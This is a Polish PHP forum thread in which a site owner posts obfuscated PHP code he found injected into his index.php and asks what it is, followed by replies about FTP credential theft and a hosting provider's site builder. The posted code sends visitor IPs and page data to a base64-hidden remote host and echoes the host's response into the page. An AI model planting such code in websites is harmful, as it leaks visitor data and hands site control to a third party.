Podejrzenie włamania na serwer

Podejrzenie włamania na serwer, Proszę o szybką pomoc

Barcelona Zobacz profil	27.09.2011, 23:36:55 Post #1
Grupa: Zarejestrowani Postów: 322 Pomógł: 15 Dołączył: 29.01.2010 Ostrzeżenie: (0%)	Witam, otworzyłem dzisiaj plik index.php i znalazłem tam taki kawałek kodu, którego nie wklejałem: [PHP] pobierz, plaintext <?php // This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = ""; if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes { if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics $stCurlLink = base64_decode( 'aHR0cDovL3JlYm90c3RhdC5jb20vYm90c3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']); $stCurlHandle = curl_init( $stCurlLink ); } } if ( $stCurlHandle !== NULL ) { curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); $sResult = @curl_exec($stCurlHandle); if ($sResult[0]=="O") {$sResult[0]=" "; echo $sResult; // Statistic code end } curl_close($stCurlHandle); } ?> [PHP] pobierz, plaintext Co to jest? Proszę o pomoc.

Odpowiedzi

Barcelona Zobacz profil	2.10.2011, 21:50:21 Post #2
Grupa: Zarejestrowani Postów: 322 Pomógł: 15 Dołączył: 29.01.2010 Ostrzeżenie: (0%)	Uuuu troche mnie nie było i widzę że wątek nabrał rumieńców (IMG:style_emoticons/default/smile.gif) Nie wiem czy to od tego ale napiszę. Mam hosting wykupiony w home.pl i tam mają ten swój "wspaniały" kreator www. Dla zabawy stworzyłem sobie serwis za pomocą tego kreatora. Może to od tego a może nie, bo tworząc serwis zgadzam się na zbieranie statystyk ze strony głównej pod którą jest podpięta domena. Musiałem odhaczyć tą opcję. Ale i tak zastanawiają mnie dwie sprawy. Jakim prawem mogą ingerować własnym kodem w skrypcie, a po drugie te statystyki były zbierane przez stat.pl, a tutaj w tym kodzie przez jakiegoś rebotstat. Wracając do tematów TC i wirusów, to ja jestem z tych co nie zaglądają na te strony co nie trzeba i staram się mieć cały czas aktualną bazę wirusów, więc wątpie żeby KIS przepuścił jakiegoś małego wirka. Chwilowo sprawa przycichła, ale muszę na bieżąco sprawdzać indexy, żeby sprawa się więcej nie powtórzyła. A czy zakodowanie kodu strony coś pomoże ?

mcsgroup Zobacz profil	4.10.2011, 12:22:09 Post #3
Grupa: Zarejestrowani Postów: 5 Pomógł: 1 Dołączył: 19.08.2011 Skąd: Reda Ostrzeżenie: (0%)	Cytat(Barcelona @ 2.10.2011, 22:50:21 ) Nie wiem czy to od tego ale napiszę. Mam hosting wykupiony w home.pl i tam mają ten swój "wspaniały" kreator www. Dla zabawy stworzyłem sobie serwis za pomocą tego kreatora. Może to od tego a może nie, bo tworząc serwis zgadzam się na zbieranie statystyk ze strony głównej pod którą jest podpięta domena. Musiałem odhaczyć tą opcję. W home.pl odhaczenie dodawania skryptu zliczającego zaprzestaje dodawania kodu do strony. Natomiast wybranie tej opcji dodaje kod nawet do pliku .css . Ogólnie jest to dość denerwujące.

Posty w temacie

Barcelona Podejrzenie włamania na serwer 27.09.2011, 23:36:55

tabbi Ktoś zbiera dane na temat twojej strony i wysyła ... 27.09.2011, 23:55:21

Barcelona Tutaj zostaje wysłane, ale jakim cudem ten kod zna... 28.09.2011, 00:03:40

tabbi Odpowiedzi na to pytanie może być wiele, zaczynaj... 28.09.2011, 00:57:51

Barcelona Nikomu nie udostępniałem hasła, znam go tylko ja i... 28.09.2011, 01:43:53

Damonsson Total Commander? ;> 28.09.2011, 01:46:10

Barcelona Już dawno nie, WinSCP 28.09.2011, 02:02:17

konrados CytatTotal Commander? A właściwie to o co chodzi ... 2.10.2011, 12:54:04

pienso Jak będziesz wiedział to daj znać gdzie była luka ... 2.10.2011, 13:55:55

konrados CytatJak będziesz wiedział to daj znać gdzie była ... 2.10.2011, 15:10:37

drozdii07 Jeśli zapamiętujesz hasło w TC, to później wirusy ... 2.10.2011, 15:14:52

konrados CytatJeśli zapamiętujesz hasło w TC, to później wi... 2.10.2011, 15:19:40

Fifi209 Cytat(konrados @ 2.10.2011, 16:19:40 ... 2.10.2011, 15:53:44

Korab To może przeskanuj sobie komputer dwoma programami... 2.10.2011, 16:03:31

konrados CytatPo pierwsze, nie musisz sobie ściągać wirusa ... 2.10.2011, 16:42:25

92nasti Cytat(konrados @ 2.10.2011, 17:42:25 ... 2.10.2011, 17:41:38

konrados CytatBłyszczysz wiedzą, w sumie to za chwile dojdz... 2.10.2011, 17:49:26

Barcelona Uuuu troche mnie nie było i widzę że wątek nabrał ... 2.10.2011, 21:50:21

mcsgroup Cytat(Barcelona @ 2.10.2011, 22:50:21... 4.10.2011, 12:22:09

by_ikar KodWracając do tematów TC i wirusów, to ja jestem ... 3.10.2011, 09:54:32

Barcelona CytatWytłumacz mi jak antywirus znajdzie wirusa, n... 4.10.2011, 11:39:02

Barcelona No i dziękuje za potwierdzenie mojej teorii Jest ... 6.10.2011, 14:44:10

gekoncaros Witam nie jestes sam ja tez na serwerze linuxpl.co... 23.11.2011, 12:24:14

pioklo Cytat(gekoncaros @ 23.11.2011, 13:24... 25.11.2011, 22:58:10

« Następny starszy · PHP · Następny nowszy »

2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)

0 Zarejestrowanych:

Forum PHP.pl